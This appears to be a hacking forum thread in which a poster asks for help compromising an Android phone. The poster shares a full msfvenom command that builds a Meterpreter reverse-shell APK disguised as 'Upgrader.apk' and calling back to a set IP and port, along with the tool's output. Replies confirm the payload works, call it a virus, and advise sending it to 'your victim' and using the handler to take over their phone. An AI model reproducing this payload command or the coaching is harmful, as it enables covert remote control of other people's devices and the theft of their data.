Forum Thread: Need Help Hacking Android Phone with Kali ...Can Anyone Help Me ...No Malicious Intentions

have tried following instructions but for some reason am unsuccesful

7 Responses

No we cant help you. Not if you don't tell us what happened and what you tried. Also, this is not your personal army of hackers.

tried this command

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk

got this result:
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8825 bytes

That's PERFECTLY NORMAL >:|...!!! Go to your /Root/ directory and you will find your virus... -.-

Then it worked. Just go to your root directory and find it. If you don't know how... cough cough script kiddie.

No malicious intentions!!!!!!!
Really???

Have you googled? Have you taken the time to at least understand the working principles of Linux. Have you tried your hand at actually writing a few scripts to see what they do and how they act?

What's the problem now?
The payload is created and you can send to your victim the use handler to have access to the victim phone
By the way there is a typo in your command:
It's reverse(underline)tcp not reversetcp

Share Your Thoughts

  • Hot
  • Active